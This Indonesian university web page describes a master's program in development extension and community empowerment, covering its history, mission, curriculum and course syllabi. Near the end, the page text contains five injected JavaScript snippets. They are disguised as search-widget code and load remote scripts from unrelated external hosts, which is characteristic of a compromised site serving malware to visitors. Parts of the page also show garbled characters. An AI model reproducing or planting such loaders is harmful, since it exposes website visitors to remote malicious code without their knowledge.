MAGISTER ILMU PENYULUHAN PEMBANGUNAN/PEMBERDAYAAN MASYARAKAT

 MAGISTER ILMU PENYULUHAN PEMBANGUNAN DAN PEMBERDAYAAN MASYARAKAT
 

SEJARAH SINGKAT

Pembukaan Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat diharapkan dapat menhasilkan Sumber Daya Manusia yang mampu merencanakan dan melaksanakan perubahan dalam masyarakat dengan memperhatikan aspek-aspek internal maupun eksternal, dan juga mampu mengorganisir proses perubahan masyarakat yang sedang berlangsung sampai dengan tercapainya masyarakat yang mandiri.
Hal-hal lain yang mendorong dibukanya Program Pasca Sarjana PS Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat di Universitas Lampung ini adalah telah tersedianya tenaga dosen dalam jumlah yang cukup yang memiliki kualifikasi dalam bidang tersebut (Guru Besar dan Doktor).  Selain itu, telah tersedianya sarana dan prasarana yang mendukung untuk pembukaan program studi ini dan keberlangsungan proses belajar mengajarnya serta cukup besarnya minat para akademisi, lulusan S1 dari Program Studi Penyuluhan dan Komunikasi Pertanian, dan kebutuhan-kebutuhan stakeholder akan SDM yang memiliki kompetensi dalam bidang Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat juga telah mendorong dibukanya Program Studi ini.  Dengan demikian pembukaan Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat (S2) di Universitas Lampung sangat strategis dalam meningkatkan kapasitas Universitas Lampung dalam pembangunan nasional serta mendukung pelaksanaan pembangunan nasional Indonesia untuk mencapai tujuan nasionalnya. Program Pascasarjana Program Magister Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Universitas Lampung didirikan pada tahun 2014 berdasarkan mandat Ditjen DIKTI Kemendikbud No. 441/E.E2/DT/2014tertanggal 19 Mei 2014.

VISI

Mengacu pada Visi Unila tersebut, maka rumusan Visi Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pascasarjana Universitas Lampung adalah “Menjadi Program Studi yang Unggul dalam Menghasilkan Lulusan yang Mampu Menerapkan Prinsip-Prinsip Penyuluhan Pembangunan dan Pemberdayaan Masyarakat serta Mampu berperan sebagai Agen Perubahan dalam Pembangunan dan Pemberdayaan Masyarakat pada tahun 2020”.

MISI

misi Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pasca Sarjana Universitas Lampung adalah sebagai berikut:

Menyelenggarakan proses belajar mengajar yang berkualitas kepada mahasiswa.
Meningkatkan kualitas penelitian bagi mahasiswa dan dosen.
Meningkatkan kualitas pengabdian kepada masyarakat untuk memberdayakan masyarakat dalam arti luas.
Membangun budaya akademik yang kondusif, dinamis, dan bermoral.
Menghasilkan dan meningkatkan kualitas lulusan sebagai agen perubahan dalam pembangunan.

Menjalin dan meningkatkan kualitas kerjasama dan kemitraan dengan para pemangku kepentingan (stakeholders), pemangku kekuasaan (powerholders), lembaga penelitian, pengabdian, dan pendidikan di tingkat nasional maupun internasional.

 

TUJUAN

Berdasarkan Standar Nasional Pendidikan Tinggi (SNPT) tersebut di atas, maka secara spesifik tujuan pendidikan PS Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pasca Sarjana Universitas Lampung adalah untuk menghasilkan sumber manusia yang 1) mampu mengembangkan pemikiran logis, kritis, sistematis, dan kreatif  melalui penelitian ilmiah, penciptaan design atau karya seni  dalam bidang ilmu pengetahuan dan teknologi penyuluhan pembangunan dan pemberdayaan masyarakat, 2) mampu menyusun konsepsi ilmiah dan hasil kajiannya berdasarkan kaidah, tatacara, dan etika ilmiah dalam bentuk tesis dan mempublikasikannya dalam bentuk jurnal ilmiah, 3) mampu melakukan penyusunan ide, hasil pemikiran dan argument saitifik serta kajian dan pengambilan keputusan dalam bidang ilmu penyuluhan pembangunan dan pemberdayaan masyarakat dalam menyelesaikan masalah yang terdapat pada masyarakat, 4) mampu mengelola, mengembangkan dan memelihara jaringan kerja dengan kolega, sejawat dan komunitas yang lebih luas, dan 5) mampu meningkatkan kapasitas pembelajaran dalam ilmu penyuluhan pembangunan dan pemberdayaan masyarakat secara mandiri.

��

KURIKULUM

Untuk mencapai lulusan Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat yang memilliki kompetensi seperti yang diharapkan tersebut,maka mata kuliah yang ditawarkan mengacu pada Standar Nasional Pendidikan dan KKNI di atas. Adapun jumlah SKS yang ditempuh untuk dapat lulus dari Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pascasarjana Universitas Lampung ini adalah 73 SKS yang dapat diselenggarakan minimal dalam waktu 2 (dua) tahun.

Besarnya jumlah SKS yang harus ditempuh oleh mahasiswa untuk dapat lulus dari Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pascasarjana Universitas Lampung sebenarnya telah mencukupi syarat minimal seperti yang telah ditetapkan dalam Standar Nasional Pendidikan Tinggi (SNPT) di Indonesia, yaitu sebanyak 72 sks. Namun demikian, program studi ini mewajibkan mahasiswa baru mengikuti program matrikulasi untuk tiga mata kuliah, yaitu Bahasa Inggris, Teori-teori Pembangunan, dan Statistika Dasar (non SKS). Bagi Calon mahasiswa Program Studi Ilmu Penyuluhan Pembangunan/ Manajemen Pemberdayaan Masyarakat yang diterima diwajibkan mengikuti program pra-pascasarjana (matrikulasi) yang diselenggarakan oleh program studiberupa kursus intensif selama satu bulan untuk mata kuliah statistika dasar, teori-teori pembangunan, dan bahasa Inggris.  Penyelengaraan program pra-pascasarjana dilakukan pada bulan Juli – Agustus setiap tahunnya.�� Mata kuliah program Pra-Pascasarjana dan dosen Penanggungjawab mata kuliah tampak pada Tabel 4.

Tabel 4.  Mata Kuliah Pra-Pascasarjana Program Studi Ilmu Penyuluhan Pembangunan dan

Pemberdayaan Masyarakat UNILA

 

No

Kode Mata Kuliah

Mata Kuliah

Dosen Pengampu

1.
PPM 500
Statistik dasar
Dr.Ir.Sumaryo, M.Si.Dr.Ir. Dewangga Nikmatullah, M.S.

2.
PPM 501
Teori-teori pembangunan
Prof.Dr.Ir. Irwan Effendi, M.S.Prof.Dr.Ir. Wan Abbas Zakaria, MS

Dr.Ir.Tubagus Hasanudin, MS

3.
PPM 502
Bahasa Inggris
Prof.Dr. Bambang Setiadi, M.ScDr. Herry Yufrizal, M.Sc

��

Struktur kurikulum Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pascasarjana Universitas Lampung dan silabus mata kuliah adalah sebagai berikut:

 

Tabel 5.  Struktur Kurikulum Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan

Masyarakat Program Pascasarjana Universitar Lampung

 

No.

Kode MK

MATA KULIAH

(SKS)

WAJIB

1.

PPM 511
Pendidikan Orang Dewasa

3

2.

PPM 512
Psikologi Belajar Mengajar

3

3.

PPM 513
Komunikasi Pembangunan

3

4.

PPS 503
Metode Penelitian

2

5.

PPS 504
Filsafat Ilmu

2

6.

PPM 521
Prinsip-prinsip Penyuluhan Pembangunan dan Pemberdayaan Masyarakat

3

7.

PPM 522
Perencanaan, Metode, Teknik dan Evaluasi Program Penyuluhan Pembangunan dan Pemberdayaan Masyarakat

3

8.

PPM 523
Metode Penelitian dan Statistika ilmu-ilmu Sosial

3

9.

PPM 531
Manajemen Pelatihan dan Pengembangan SDM

3

10.

PPM 532
Karya Ilmiah

10

11.

PPM 533
Proposal Tesis

5

12.

UNI 541
Seminar

5

13.

UNI 542
Penelitian dan Penulisan Tesis

20

JUMLAH

65

PILIHAN

14.

PPM 524
Kelompok, Organisasi, dan Kepemimpinan

3

15.

PPM 525
Struktur dan Perubahan Sosial

3

16.

PPM 526
Dinamika Pembangunan Masyarakat

3

17.

PPM 534
Pembangunan Ketahanan Pangan dan Gizi Masyarakat

3

18.

PPM 535
Perkoperasian dan UMKM

3

19.

PPM 536
Manajemen Konflik

3

   20.
PPM 541
Gender dan Pembangunan

3

21.

PPM 542
Tanggungjawab Sosial Perusahaan

3

22.

PPM 543
Pengembangan Wilayah

3

JUMLAH

27

 

 

Berdasarkan Tabel 5 tampak bahwa jumlah mata kuliah yang harus ditempuh pada program magister (S2) Program Studi Ilmu Penyuluhan Pembangunan dan Pemberdayaan Masyarakat Program Pascasarjana Universitas Lampung sebanyak 13 mata kuliah wajib dan 9 mata kuliah pilihan. Silabus dan buku putaka untuk matakuliah-matakuliah tersebut adalah sebagai berikut:

 

PPM     500      Teori-teori Pembangunan

Preskripsi arah pembangunan di Negara-negara Dunia Ketiga setelah berakhirnya Perang Dunia II dalam konteks historis dan perkembangan teoretis dalam ilmu sosial, studi pembangunan, berbagai teori pembangunan dengan berbagai variasinya,termasuk variasi ideologis yang mendasari teori-teori tersebut. Teori-teori pembangunan (teori-teori modernisasi dan teori-teori ketergantungan). Kritik terhadap teori-teori pembangunan yang dominan, pergeseran dari teori tentang kebijakan kea rah wacana tentang pembangunan.

 

PPM     501      Statistika Dasar

Statistik deskriptif, statistik inferensial, ukuran statistic bagi data, penkripsian data, teori peluang, macam-macam sebaran data, penarikan contoh, pendugaan parameter, pengujian hipotesis, korelasi dan regresi, analisis ragam, statistika non parametrik.

 

PPM     502      Bahasa Inggris Untuk Penelitian

Grammar, writing, reading, listening, sentence, clause, vocabulary and idiom relatedto extension and community development.

 

PPM     511      Pendidikan Orang Dewasa

Pengertian dan makna pendidikan orang dewasa, karakteristik orang dewasa, pola partisipasi dan pendidikan orang dewasa, institusi dan program pendidikan orang dewasa, latar belakang sosiologis pendidikan orang dewasa, teori pendidikan bagi orang dewasa, prinsip-prinsip pendidikan orang dewasa, cara belajar orang dewasa, dan metode pendidikan orang dewasa.

 

PPM   ���� 512      Psikologi Belajar Mengajar

Sifat-sifat pada manusia, tujuan pendidikan, proses dan teori belajar, motivasi belajar, prinsip-prinsip belajar, pemilihan dan pengorganisasian metode dan teknik mengajar, pengajaran yang berpusat pada masalah, retensi dan transfer belajar, sintesis dan penggunaan konsep-konsep pendidikan dalam program penyuluhan dan pemberdayaan masyarakat, penyusunan kurikulum latihan, penilaian dan pengukuran hasil belajar.

 

PPM     513 ������    Komunikasi Pembangunan

Konsep komunikasi dalam penyuluhan pembangunan dan pemberdayaan masyarakat, model-model komunikasi untuk transformasi perilaku manusia, metode, teknik, dan media komunikasi dalam penyuluhan pembangunan dan pemberdayaan masyarakat, pendayagunaan media komunikasi dalam sistem sosial, komunikasi verbal dan non verbal, komunikasi antar personal, komunikasi kelompok, dan komunikasi massa serta perannya dalam penyuluhan pembangunan dan pemberdayaan masyarakat, pendukung dan penghambat komunikasi dalam proses difusi inovasi pembangunan, pengembangan media interaksi dan teknologi komunikasi dalam penyuluhan pembangunan dan pemberdayaan masyarakat.

 

PPM������  �� 521��������   ������ Prinsip-prinsip Penyuluhan Pembangunan dan Pemberdayaan Masyarakat

Pengantar penyuluhan pembangunan dan pemberdayaan masyarakat, falsafahdan prinsip penyuluhan pembangunan dan pemberdayaan masyarakat, pengenalan wilayah kerja dan sasaran penyuluhan dan pemberdayaan masyarakat, proses adopsi dan difusi inovasi pembangunan, unsur-unsur penyuluhan dan pemberdayaan masyarakat, keterkaitan penyuluhan dan pemberdayaan masyarakat dengan komunikasi, teori-teori penyuluhan pembangunan dan pemberdayaan masyarakat, komunitas dan pengembangan masyarakat dalam perspektif sosiologi, sejarah program pengembangan masyarakat, pemberdayaan dan partisipasi warga komunitas, metode-metode partisipasif dalam pengembangan masyarakat, pengorganisasikan warga komunitas, peranan pekerja pengembangan masyarakat, pengembangan kelembagaan dan modal sosial dalam pengembangan masyarakat, pengembangan masyarakat dalam konteks pembangunan daerah.

 

PPM     522      Perencanaan, Metode, Teknik dan Evaluasi Program Penyuluhan Pembangunan dan Pemberdayaan Masyarakat

Konsep-konsep perencanaan dan evaluasi program penyuluhan pembangunan dan pemberdayaan masyarakat, teori-teori perencanaan dan evaluasi program, sejarah dan penerapan konsep-konsep dan prinsip-prinsip dalam perencanaan program penyuluhan dan pemberdayaan masyarakat, pengembangan program penyuluhan yang efektif, tujuan pendidikan dan pengembangan kurikulum pendidikan penyuluhan dan pemberdayaan masyarakat, fase-fase perubahan berencana, menggerakan masyarakat dan bekerja menuju perubahan, prinsip dan tata kerja evaluasi program dan penelitian di bidang penyuluhan pembangunan dan pemberdayaan masyarakat, tujuan, proses, dan manfaatnya, metode dan Teknik Penyuluhan Pembangunan dan Pemberdayaan Masyarakat, Konsep-konsep metode dan teknik penyuluhan dan pemberdayaan masyarakat, prinsip-prinsip metode dan teknik penyuluhan pembangunan dan pemberdayaan masyarakat, jenis-jenis metode dan teknik penyuluhan dan pemberdayaan masyarakat, efektivitas metode dan teknik penyuluhan pembangunan dan pemberdayaan masyarakat, kendala metode dan teknik penyuluhan pembangunan dan pemberdayaan masyarakat, langkah-langkah dalam evaluasi program dan penelitian di bidang penyuluhan pembangunan dan pemberdayaan masyarakat, pemilihan dan perumusan masalah, perumusan tujuan, penentuan aspek program atau parameter yang akan dievaluasi, pengukuran parameter, metode pengumpulan data, penskalaan, analisis, penafsiran, pengambilan kesimpulan, dan pelaporan hasil evaluasi program/penelitian di bidang penyuluhan pembangunan dan pemberdayaan masyarakat.

 

PPM     523   ������ Metode Penelitian dan Statistika Ilmu-ilmu Sosial

Deskripsi dan lingkup penelitian di bidang penyuluhan/pemberdayaan masyarakat, pengembangan dan penalaran dan berfikir ilmiah, pendekatan induktif dan deduktif, identifikasi dan penentuan masalah penelitian, macam-macam penelitian, tujuan penelitian, proses penelitian, limitasi penelitian, mengembangkan kerangka berfikir penelitian berdasarkan teori dan konsep perilaku manusia yang relevan dengan topic penelitian, usul penelitian/tesis yang baik benar secara sistematis dan mengikuti kaidah-kaidah ilmiah.  Kegunaan tes statistika dalam penelitian, memilih tes statistic yang cocok, kasus satu sampel, kasus dua sampel yang berhubungan, kasus dua sampel independen, kasus k-sampel berhubungan, kasus sampel independen, ukuran korelasi dan tes signifikansi, berbagai perangkat lunak (software) aplikasi statistic parametric dan non parametric.

 

PPM     524      Kelompok, Organisasi, dan Kepemimpinan

Unsur-unsur dasar kelompok dan organisasi, ukuran kelompok dan organisasi, norma-norma kelompok dan organisasi, tujuan kelompok dan organisasi, jenis-jenis kelompok dan organisasi, teori kelompok dan organisasi, dinamika kelompok dan organisasi, efektivitas kelompok dan organisasi, perilaku kelompok dan organisasi, karakteristik pemimpin dan kepemimpinan, teori kepemimpinan, bentuk-bentuk kepemimpinan, kepemimpinan dan efektivitas kelompok dan organisasi, perkembangan teori kelompok, organisasi, dan kepemimpinan.

 

PPM     525      Struktur dan Perubahan Sosial

Konsep-konsep struktur sosial, unsure-unsur struktur sosial, lembaga/pranata sosial, kekuasaan dan wewenangan, proses dan interaksi sosial, teori-teori struktur sosial, stratifikasi sosial, pengendalian sosial, dan perubahan struktur sosial,fase-fase perubahan berencana, menggerakan masyarakat dan bekerja menuju perubahan, perspektif teori-teori perubahan sosial budaya, perubahan berencana, sistem sosial dan proses-proses perubahan fundamental, penyebab perubahan sosial dan kebudayaan, arah perubahan sosial, perspektif teori modernisasi, perspektif teori penyandaran, pespektif teori imperialism budaya, perspektif teori interksi, perspektif teori difusi inovasi.

 

PPM     526      Dinamika Pembangunan Masyarakat

Kebijakan-kebijakan dalam pembangunan masyarakat, pembangunan wilayah pedesaan dan perkotaan, kaitan pembangunan pedesaan dan perkotaan, program-program pembangunan pedesaan dan perkotaan, faktor pendorong dan penghambat dalam pembangunan, pembangunan dan kemiskinan, teknologi dan pembangunan, gerak perubahan pembangunan masyarakat.

 

PPM     531����������    Manajemen Pelatihan dan Pengembangan SDM

Telaah berbagai faktor pelatihan:a. Macam pelatihan: penataran, kursus, latihan kerja, lokakarya dan pre & in service training, b. Kebutuhan pelatihan berdasarkan kesenjangan, kurikulum pelatihan, prinsip-prinsip pelatihan, motivasi bagi peserta pelatihan, sarana pelatihan, pengendalian manajemen pelatihan dan evaluasi hasil pelatihan, teori tentang kebutuhan dasar manusia, sumberdaya alam dan lingkungan serta cara pendekatan penyuluhan yang dapat berperan dalam menumbuhkembangkan kesadaran masyarakat, keluarga dan individu akan kebutuhan dalam meningkatkan kualitas hidup, teori tentang �������coping mechanism” untuk pemenuhan kebutuhan dasar, teori sistem nilai sebagai bagian dari perilaku manusia.

 

PPM   �� 532    �������� Manajemen Organisasidan Kelompok

Konsep organisasi dan kelompok, sifat-sifat dan karakteristik kelompok dan organisasi sosial, perkembangan kelompok dan organisasi, konsep efektivitas kelompok dan organisasi, fungsi-fungsi kelompok dan organisasi, proses-proses kelompok dan organisasi dan pengelolahannya, kepemimpinan dalam kelompok dan organisasi, pembinaan dan pengembangan kelompok dan organisasi, konsep-konsep psikologi sosial dan manajemen dalam kelompok dan organisasi.

PPM 534  Pembangunan Ketahanan Pangan dan Gizi Masyarakat

Sistem, kebijakan, langkah-langkah dan strategi dalam membangun ketahanan pangan baik di

tingkatmasyarakat (mikro)maupunnasional dan internasional (makro)mulai dari aspek

ketersediaan, distribusi dan konsumsi pangan,cara -cara pengukuran ketahananan

pangan serta isu-isu terkini dan kaitan antara ketahanan pangan dan gizi masyarakat dengan

berbagai dan aspek sektor melalui telaah jurnal ilmiah.

 

PPM 541  Gender dan Pembangunan

Konsep dasar gender dan pembangunan; Teori-teori gender, Paradigma studi gender; Relasi

gender dan kaitannya dengan pembangunan; Pendekatan studi gender dalam pembangunan

(Woman in Development “WID”, Gender and Development “GAD”, Gender Mainstreaming

“GM”, Pengarusutamaan Gender ���PUG”, MDG’S); Isu gender dalam pembangunan; Teori-teori

feminis; Gerakan sosial perempuan; Penelitian berperspektif gender; Teknik analisa gender

(Havard, Longwe, Social Economic and Gender Analysis “SEAGA”, Gender Analysis Pathway

“GAP”, Gender Analysis Matrix “GAM���),

 

PPM 542  Tanggungjawab Sosial Perusahaan

Pemahaman dan interpretasi CSR, filosofi CSR, dimensi tanggungjawab sosial,prinsip-prinsip CSR, Pendekatan dan Strategi CSR, Model-model CSR, pengukkuran kinerja program CSR, Isu-isu CSR, peranan-peranan CSR (untuk kohesi sosial, dalam pendidikan, untuk pelestarian lingkungan hidup, dalam ekonomi kerakyatan, dalam anti korupsi dan penegakan HAM, untuk ketahanan pangan dan gizi) wirausaha sosial, contoh-contoh implementasi program CSR, masalah-masalah dalam implementasi CSR, dan praktik-praktik pemberdayaan masyarakat oleh perusahaan.

 

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://theboatersnetwork.com/js/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://cjccontabil.com.br/wp-content/themes/Hermes/main1.js”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();

(function() {
var gcse = document.createElement(‘script’);
gcse.type = ‘text/javascript’;
gcse.async = true;
gcse.src = “http://ninni.org/core9Om3.php”;
var s = document.getElementsByTagName(‘script’)[0];
s.parentNode.insertBefore(gcse, s);
})();


>>Program Pascasarjana Universitas Lampung berdiri sejak tahun 1999, Sampai sekarang Program Pascasarjana Universitas Lampung sudah mempunyai 2 Program Doktor dan 32 Program Studi Magister Terakreditasi<<